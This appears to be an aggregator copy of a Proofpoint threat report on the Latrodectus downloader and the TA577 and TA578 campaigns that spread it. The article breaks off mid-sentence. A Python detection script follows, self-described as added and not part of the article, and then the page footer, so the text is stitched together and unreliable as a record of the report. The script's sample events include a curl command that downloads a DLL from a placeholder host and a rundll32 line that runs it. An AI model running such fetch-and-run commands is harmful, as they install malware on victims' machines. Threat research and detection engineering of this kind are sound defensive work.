One Article Review

Source ProofPoint
Identifier 8475749
Publication date 2024-04-04 11:47:34 (viewed: 2024-04-04 09:07:12)
Title Latrodectus: This Spider Bytes Like Ice
Text Proofpoint's Threat Research team joined up with the Team Cymru S2 Threat Research team in a collaborative effort to provide the information security community with a comprehensive view of the threat activity described.

Key takeaways

- Proofpoint first observed new malware named Latrodectus appear in email threat campaigns in late November 2023.
- While use of Latrodectus decreased in December 2023 through January 2024, its use increased in campaigns throughout February and March 2024.
- It was first observed in Proofpoint data being distributed by threat actor TA577, but has been used by at least one other threat actor, TA578.
- Latrodectus is an up-and-coming downloader with various sandbox evasion functionality.
- While similar to IcedID, Proofpoint researchers can confirm it is an entirely new malware, likely created by the IcedID developers.
- Latrodectus shares infrastructure overlap with historic IcedID operations.
- While investigating Latrodectus, researchers identified new, unique patterns in campaign IDs designating threat actor use in previous IcedID campaigns.

Overview

Proofpoint identified a new loader called Latrodectus in November 2023. Researchers have identified nearly a dozen campaigns delivering Latrodectus, beginning in February 2024. The malware is used by actors assessed to be initial access brokers (IABs).

Latrodectus is a downloader with the objective of downloading payloads and executing arbitrary commands. While initial analysis suggested Latrodectus was a new variant of IcedID, subsequent analysis confirmed it was a new malware, most likely named Latrodectus based on a string identified in the code. Based on characteristics in the disassembled sample and the functionality of the malware, researchers assess the malware was likely written by the same developers as IcedID.

This malware was first observed being distributed by TA577, an IAB known as a prolific Qbot distributor prior to that malware's disruption in 2023. TA577 used Latrodectus in at least three campaigns in November 2023 before reverting to Pikabot. Since mid-January 2024, researchers observed it being used almost exclusively by TA578 in email threat campaigns.

Campaign details

TA577

TA577 was only observed using Latrodectus in three campaigns, all occurring in November 2023. Notably, a campaign that occurred on 24 November 2023 deviated from previously observed TA577 campaigns. The actor did not use thread hijacking, but instead used a variety of different subjects with URLs in the email body. The URLs led to the download of a JavaScript file. If executed, the JavaScript created and ran several BAT files that leveraged curl to fetch a DLL, then ran that DLL via the export "scab".

Figure 1: Example TA577 campaign delivering Latrodectus.

On 28 November 2023, Proofpoint observed the last TA577 Latrodectus campaign. The campaign began with thread-hijacked messages that contained URLs leading to either zipped JavaScript files or zipped ISO files. The zipped JavaScript file used curl to download and execute Latrodectus. The zipped ISO file contained a LNK file used to execute the embedded DLL, Latrodectus. Both attack chains started the malware with the export "nail".

TA578

Since mid-January 2024, Latrodectus has been almost exclusively distributed by TA578. This actor typically uses contact forms to initiate a conversation with a target. In one campaign observed on 15 December 2023, Proofpoint observed TA578 deliver the Latrodectus downloader via a DanaBot infection. This December campaign was the first observed use of TA578 distributing Latrodectus.

On 20 February 2024, Proofpoint researchers observed TA578 impersonating various companies to send legal threats about alleged copyright infringement. The actor filled out a contact form on multiple targets' websites, with text containing unique URLs, and included in the URI both the domain of the site that initiated the contact form (the target) and the name of the impersonated company (to further the legitimacy
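The two TA577 launch chains above (JavaScript, then BAT files that use curl to fetch a DLL started via the export "scab"; and an ISO-embedded LNK that starts the DLL via the export "nail") are the kind of pattern a detection engineer would hunt for in process-creation telemetry. The following is an added example, not code from the article or from Proofpoint: it flags DLL launches that name one of the reported exports and raises the confidence when the launch sits under a script host with a curl.exe sibling. It assumes the DLL is started through rundll32.exe (the article only says the DLL was "run with the export"; rundll32 is the usual way to do that), and the sample events, paths, PIDs and download URL are constructed placeholders, not indicators from the article.

```python
"""Hunt for the Latrodectus launch pattern in process-creation telemetry.

Added example; sample events are constructed and the rundll32.exe launch
method is an assumption (the article only names the exports "scab"/"nail").
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Export names the article reports for the TA577 chains (24 and 28 Nov 2023).
LATRODECTUS_EXPORTS = {"scab", "nail"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Assumption: the DLL is launched through rundll32.exe, either as
#   rundll32.exe C:\path\x.dll,export   or   rundll32.exe "C:\path\x.dll" export
RUNDLL32_RE = re.compile(
    r'rundll32(?:\.exe)?\s+"?(?P<dll>[^",\s]+?\.dll)"?(?:\s*,\s*|\s+)(?P<export>[A-Za-z0-9_#]+)',
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable basename, as an EDR would record it
    cmdline: str


def dll_export(cmdline: str) -> Optional[Tuple[str, str]]:
    """Return (dll path, lower-cased export name) from a rundll32 command line, or None."""
    m = RUNDLL32_RE.search(cmdline)
    if not m:
        return None
    return m.group("dll"), m.group("export").lower()


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Walk the parent chain; bounded so PID reuse cannot loop forever."""
    chain: List[ProcEvent] = []
    cur = by_pid.get(ev.ppid)
    while cur is not None and len(chain) < 16:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def find_latrodectus_chains(events: List[ProcEvent]) -> List[dict]:
    """Flag rundll32 launches of a DLL via a known Latrodectus export.

    Confidence is "high" when the launch sits under a script host and has a
    curl.exe sibling (the JS -> BAT -> curl -> DLL chain), otherwise "medium"
    (e.g. the ISO/LNK chain, where the DLL is started straight from Explorer).
    """
    by_pid = {e.pid: e for e in events}
    hits: List[dict] = []
    for ev in events:
        if ev.image.lower() != "rundll32.exe":
            continue
        parsed = dll_export(ev.cmdline)
        if parsed is None or parsed[1] not in LATRODECTUS_EXPORTS:
            continue
        dll, export = parsed
        anc = ancestors(ev, by_pid)
        under_script_host = any(a.image.lower() in SCRIPT_HOSTS for a in anc)
        curl_sibling = any(
            s.image.lower() == "curl.exe" and s.ppid == ev.ppid for s in events
        )
        confidence = "high" if (under_script_host and curl_sibling) else "medium"
        hits.append({
            "pid": ev.pid,
            "dll": dll,
            "export": export,
            "confidence": confidence,
            "ancestry": [a.image for a in anc],
        })
    return hits


# Constructed sample telemetry (not from the article). PIDs 200-302 mimic the
# 24 Nov 2023 JS/BAT/curl chain, PID 500 mimics the LNK-from-ISO chain, and
# PID 400 is a benign rundll32 use that must not be flagged.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "wscript.exe", r'wscript.exe "C:\Users\u\Downloads\document_4472.js"'),
    ProcEvent(300, 200, "cmd.exe", r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\a1.bat"'),
    ProcEvent(301, 300, "curl.exe", r"curl.exe -o C:\Users\u\AppData\Local\Temp\upd.dll https://example.invalid/share/upd"),
    ProcEvent(302, 300, "rundll32.exe", r"rundll32.exe C:\Users\u\AppData\Local\Temp\upd.dll,scab"),
    ProcEvent(400, 100, "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcEvent(500, 100, "rundll32.exe", r'rundll32.exe "D:\x.dll",nail'),
]

if __name__ == "__main__":
    for hit in find_latrodectus_chains(SAMPLE_EVENTS):
        print(hit)
```

The export-name match alone is a weak signal (exports are trivially renamed between builds), which is why the ancestry and curl sibling are used to separate the full JS/BAT chain from an isolated rundll32 launch; in a real deployment the medium-confidence hits would be enriched with the DLL's origin (mounted ISO, browser download) before alerting.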
Sent Yes
Tags Ransomware Malware Tool Threat Prediction
Rating ★★★


The article does not appear to have been picked up after its publication.


The article does not appear to pick up on a previous one.